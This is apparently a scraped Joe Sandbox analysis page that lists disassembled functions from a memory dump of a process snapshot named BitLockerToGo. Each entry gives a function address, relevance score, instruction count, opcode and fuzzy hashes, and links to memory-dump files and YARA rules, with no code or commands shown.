Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0<1
API String ID: 0-2445462277
Opcode ID: 3488d972a0300768358961edd103ec2f93c0543d4fc4d6f44dd535d494cf594b
Instruction ID: dfb10fc16a0e37bb0940d0dff3f743823947f44c68e83774d240fba24012bc83
Opcode Fuzzy Hash: 3488d972a0300768358961edd103ec2f93c0543d4fc4d6f44dd535d494cf594b
Instruction Fuzzy Hash: A3E1E2B0106B818BD734CF29C4907ABBBE2AF52314F148A5DD8EB4B796C775B449CB90

Function 026E4B70 Relevance: 1.7, Strings: 1, Instructions: 420COMMON

Download Yara Rule

Strings

", xrefs: 026E4E64

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 85b9fe4a800c276bfbf2a41fbeb8b5bd83aadbc63ceb3afee1e659fb1ea6169c
Instruction ID: 3aecff3bf830789c6fe7a3fb34b786186f1b3c882cd4c12930f383671c1a898d
Opcode Fuzzy Hash: 85b9fe4a800c276bfbf2a41fbeb8b5bd83aadbc63ceb3afee1e659fb1ea6169c
Instruction Fuzzy Hash: 19D118B2A0A3505FCF25CE34C49076BB7D9AF84214F09896DE89B87381DB35D948C7D2

Function 026FE390 Relevance: 1.7, Strings: 1, Instructions: 414COMMON

Download Yara Rule

Strings

%7, xrefs: 026FE786, 026FE726

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %7
API String ID: 0-1474192009
Opcode ID: 96da383b2e314ecd14073bf12da0fcc08c5b6652385f1d343e235a61adb66f8c
Instruction ID: 9ee56bc7989ef5d34d3fc737e4b1c458e36905eda6409a4d3a32861cb3f6af3c
Opcode Fuzzy Hash: 96da383b2e314ecd14073bf12da0fcc08c5b6652385f1d343e235a61adb66f8c
Instruction Fuzzy Hash: 68E1A075E0011ACFCF44CFA8D8902AEBBB2FF89314F288569C91177385D736A915CBA1

Function 026EC521 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 026EC532

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: b7aae13efa6350954720c1eb619e176f1962288c85ee09107d2eaf119ab9a932
Instruction ID: 7cc10394d016d4fceff98580bb7f360e6625d52c63911f70603b48e16f3ab238
Opcode Fuzzy Hash: b7aae13efa6350954720c1eb619e176f1962288c85ee09107d2eaf119ab9a932
Instruction Fuzzy Hash: 9D61C1B144E3C48ED3A4AFA4C64439FBAE5EFA0745F058C6EE1D997242C7748548CBA3

Function 026CA500 Relevance: 1.6, Strings: 1, Instructions: 351COMMON

Download Yara Rule

Strings

-, xrefs: 026CA609

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 968cae8369e8ae61ee48b9346d15dc0b1226b34b1238760b9d7f00d6aa094d39
Instruction ID: 05e3a0475d7d7753877ec1ac8b3d4984a2b3fc87f20ba7a4689b792acda5c444
Opcode Fuzzy Hash: 968cae8369e8ae61ee48b9346d15dc0b1226b34b1238760b9d7f00d6aa094d39
Instruction Fuzzy Hash: F0C13672A0C3598BC314AEA9C89027AB7E3EBC1314F798A2CD5D15B395D735AC46CBC1

Function 026F6E82 Relevance: 1.6, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

4`[b, xrefs: 026F7220

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: b5f04d849b766872251b4b6d2ffba2184b663749c76330a944a43142ea7e7741
Instruction ID: 04220d014588e42066baf4a29d4164b81e6798152f3df4dc1b741cdf923ce0a0
Opcode Fuzzy Hash: b5f04d849b766872251b4b6d2ffba2184b663749c76330a944a43142ea7e7741
Instruction Fuzzy Hash: CDA1A275E54216CFDF18CFA4D890AAEF7B2FB88304F548928D61267388D735A916CB90

Function 026F6150 Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

4`[b, xrefs: 026F6570

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: a7dac15305565d73b9bed21befee35a6f6073d14c82b04d40d227bd8d11f8b4b
Instruction ID: c2f9be3433a74b96d05b13f74dcdc6b21cbb10c13c9dd16d44aa10f661ae678e
Opcode Fuzzy Hash: a7dac15305565d73b9bed21befee35a6f6073d14c82b04d40d227bd8d11f8b4b
Instruction Fuzzy Hash: 6DC1587290D3808FC754EF68C59032ABBE6EF95318F154A2DE2A6873C2D775C945CB12

Function 026E23B5 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

4`[b, xrefs: 026E2CB0

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: a64c2ddb4866de74c62a1cb30e99b1d215223c805056040b6b4ea53af67f25d4
Instruction ID: 6b1573ba64b60f5412eb9e7475ca3e0706c6e4fc12f4ff2c12299ef514df9a03
Opcode Fuzzy Hash: a64c2ddb4866de74c62a1cb30e99b1d215223c805056040b6b4ea53af67f25d4
Instruction Fuzzy Hash: 6BC17CB5E01219CFDB18CF58C8907AEB7B6FF89304F1941A9D906AB381DB74A941CF90

Function 026C8190 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

,, xrefs: 026C82D8

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 9463f21d3a386412f113d05c36af7867a24f916eee9a2d18aad1f134eeafbec6
Instruction ID: 1228b4313d09d05623c4b8d4f355db489265b0c1f5ca4d774561ec5ff7b61a2e
Opcode Fuzzy Hash: 9463f21d3a386412f113d05c36af7867a24f916eee9a2d18aad1f134eeafbec6
Instruction Fuzzy Hash: 8BB169711083818FC325DF58C89466BFBE0AFA9204F588D2DF5D997342D635EA08CBA7

Function 026F5CD0 Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

,, xrefs: 026F5D05

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 8b97ec2295e2e4b8f451363a5a825263d5b015718fb2178552230e562b22c295
Instruction ID: 827c14337b8da1e030ca69caa4a479a440a051813a50f4869f8ae60f7d1efb2c
Opcode Fuzzy Hash: 8b97ec2295e2e4b8f451363a5a825263d5b015718fb2178552230e562b22c295
Instruction Fuzzy Hash: 5991F3B1D052448BCB04EF78D9813AEBFB1EF46310F55456DD656AB381E3348918CFA2

Function 026FA830 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

476, xrefs: 026FA866

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 476
API String ID: 0-2414438958
Opcode ID: 666c1672eb91be6e31255ea8469cc840bc66f9512bfe6ab9c34a9e4343959ec7
Instruction ID: 342be90c0e2805796aec719b71d10cc10812b59b4fa2f3abefdf232cd62ff523
Opcode Fuzzy Hash: 666c1672eb91be6e31255ea8469cc840bc66f9512bfe6ab9c34a9e4343959ec7
Instruction Fuzzy Hash: BC51AE71A083009FDB54DF58D8C4B1AB7E2EB84B04F19C92CEA8857345D732AC15CB96

Function 026FE8D0 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

@, xrefs: 026FE995

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: c8498fdc1984c7915662d0d6cf6812f5c738e9849e556c6014ef49c5a4b7313b
Instruction ID: 37270262a179a3f4ba404db125f361d1ae151c49f6b47d44794116e1ee357e61
Opcode Fuzzy Hash: c8498fdc1984c7915662d0d6cf6812f5c738e9849e556c6014ef49c5a4b7313b
Instruction Fuzzy Hash: 7F41C2719083419BDB14CF24C850B2BBBE2FFC5318F198A1CE6955B3A0D7369415CB96

Function 026FF290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

@, xrefs: 026FF2F8

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 5d75513284bb8222156ead296fe911b05042ad931e2c6749a2ba67b045eae1ad
Instruction ID: 2711efbb29e663543c478c591033293e00cba6ce067113bb9f92f6b3dc18ccf8
Opcode Fuzzy Hash: 5d75513284bb8222156ead296fe911b05042ad931e2c6749a2ba67b045eae1ad
Instruction Fuzzy Hash: E531BA725083058BCB00DF18D8C0A2EFBF5FB85318F14892DE68887391D739E809CBA6

Function 026D3846 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

9, xrefs: 026D38E8

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 3a2dae443b085c531350220fea5eeb817b08ca310dc6a0ca7f377d453e89a65f
Instruction ID: c7fa7388a4619a4ad3f15589cad7bcdbcc45484d7a1ba7ce8253db943cdb5bdc
Opcode Fuzzy Hash: 3a2dae443b085c531350220fea5eeb817b08ca310dc6a0ca7f377d453e89a65f
Instruction Fuzzy Hash: 48410274A0C380DFC354CF24D09465EBBE0AB89398F44AD6CE4CA97261D730D9A4CB1B

Function 026C9810 Relevance: .9, Instructions: 868COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 152f9c810d12586b04619026d9cb1e94cfdb1c9bbae0c707d46441bb48503418
Instruction ID: 58107d91ee2dad003e656e7c1e58410182c8f5be3ae1ccc88ec4e7ffc3f80c50
Opcode Fuzzy Hash: 152f9c810d12586b04619026d9cb1e94cfdb1c9bbae0c707d46441bb48503418
Instruction Fuzzy Hash: 6F52B032609711CBC725EF18D48027AB3E2FFD4318F29892DD9D697385D739A852CB82

Function 026C4FD0 Relevance: .7, Instructions: 711COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52eb715cff42d82d2dd121a7a4b18456bf72abd0b98d8bf39a5b575b64eec081
Instruction ID: 8e2f6d93da90911da411d4d50b1f95f135eb403b3ecd0124fd17e7309dc3f298
Opcode Fuzzy Hash: 52eb715cff42d82d2dd121a7a4b18456bf72abd0b98d8bf39a5b575b64eec081
Instruction Fuzzy Hash: 6052D4315083458FC718DF19C8906BABBE1FF88318FA9866DE8DA67351D774E845CB81

Function 026C5A40 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86bcfdda4fb6d4aee119311bfe0569a9c302df415a748533091d13ee8a8e4a19
Instruction ID: 8804352a05818e399b612f54573037ab77f1f0f5e7ea44e0cf6de15a2cac7b34
Opcode Fuzzy Hash: 86bcfdda4fb6d4aee119311bfe0569a9c302df415a748533091d13ee8a8e4a19
Instruction Fuzzy Hash: 433212B0614B108FC368DF29CA9052ABBF1FF85610BA04A2ED6A797F91D736F445CB14

Function 026E3BE0 Relevance: .6, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f199c18a53aee0665d1cab9db5ed05b66846c1b5fcb2433e0359e914d225ea26
Instruction ID: 0e6d8267551b97a1747cc09912225faed1301e69d02771bd283698fe25d016f9
Opcode Fuzzy Hash: f199c18a53aee0665d1cab9db5ed05b66846c1b5fcb2433e0359e914d225ea26
Instruction Fuzzy Hash: 1502D2B4901229CBDF18CF58C8A07BEB7B2FF46314F148598E856AF395E7749841CBA4

Function 026C7B80 Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8969084deece727999eb42d9af3df549a05b538dac9d7eb31a39d6b4a738bb07
Instruction ID: 60835941b84202e1bd865c336d299837c80c6c4ada92bd0ebdc86dbcc983d7a3
Opcode Fuzzy Hash: 8969084deece727999eb42d9af3df549a05b538dac9d7eb31a39d6b4a738bb07
Instruction Fuzzy Hash: 9612C5356083418FC719DF29C88176AFBE6FFC9204F18986DE48987351D77AD806CB96

Function 026FD5DE Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4534eb6b52e72a07ee0e7e5cfd51dad76994e51dbea554ea6dc2ca21201fba7a
Instruction ID: c442a3c0986e596f0962c021220429e84d3c2688b5dd4f6b1788b899ef78dd90
Opcode Fuzzy Hash: 4534eb6b52e72a07ee0e7e5cfd51dad76994e51dbea554ea6dc2ca21201fba7a
Instruction Fuzzy Hash: E5D12336E18251CFC718CF29D48052AF7E2BF89354F0A8A6CD99597382CB30ED55CB81

Function 026F0035 Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7275908fc8e003ee71bc987090b7c033a8d1c6620a0215d9d8766c8ce0923d1e
Instruction ID: 8cf868f2584e0ec47b7fc9d47706642aa36a7465f5f1cefc27f4b24a5685a455
Opcode Fuzzy Hash: 7275908fc8e003ee71bc987090b7c033a8d1c6620a0215d9d8766c8ce0923d1e
Instruction Fuzzy Hash: 05F130B1819B808AD310BF749E0531BBEF1EF9274AF49895CD4D84B242E675921C9FA3

Function 026F06F7 Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0589271dd23722c8a96e17d638ea7ec3cdc13eb300ef51e2e47904329872782
Instruction ID: d8203be00492f618dca42d17f7b584855381b4261b729b0e0add2ead94918a25
Opcode Fuzzy Hash: d0589271dd23722c8a96e17d638ea7ec3cdc13eb300ef51e2e47904329872782
Instruction Fuzzy Hash: BFF120B1819B808AD310BF749E0531BBEF2EF5274AF49895CD4D84B342E675921C9FA3

Function 026D04D1 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7136d2c75aec0177047f6548cce785860c3624504080849f2eaa241f3ec3a16
Instruction ID: 098cf639c32552a70dbf2478024a4898a51d59a877de2a16128612b9f986bfec
Opcode Fuzzy Hash: d7136d2c75aec0177047f6548cce785860c3624504080849f2eaa241f3ec3a16
Instruction Fuzzy Hash: FBC135B191C3808BD325EF18C480BAEBBE5EF96304F14092DE5C987351E7369855CB9B

Function 026E37A0 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d771121c06eb9bcdd1e8d7d32e9517069f447f5e4ba6c95e2e39325e38a51a23
Instruction ID: fe4b545f70b3ec2a38ce075ff89f9564189a23b0ad995486f9e5418de4efcb6f
Opcode Fuzzy Hash: d771121c06eb9bcdd1e8d7d32e9517069f447f5e4ba6c95e2e39325e38a51a23
Instruction Fuzzy Hash: CBC1BAB5D002598FDF24CF68C890BAEB7B2EF06304F184599D85AAB381D734AA51CF91

Function 026C8870 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

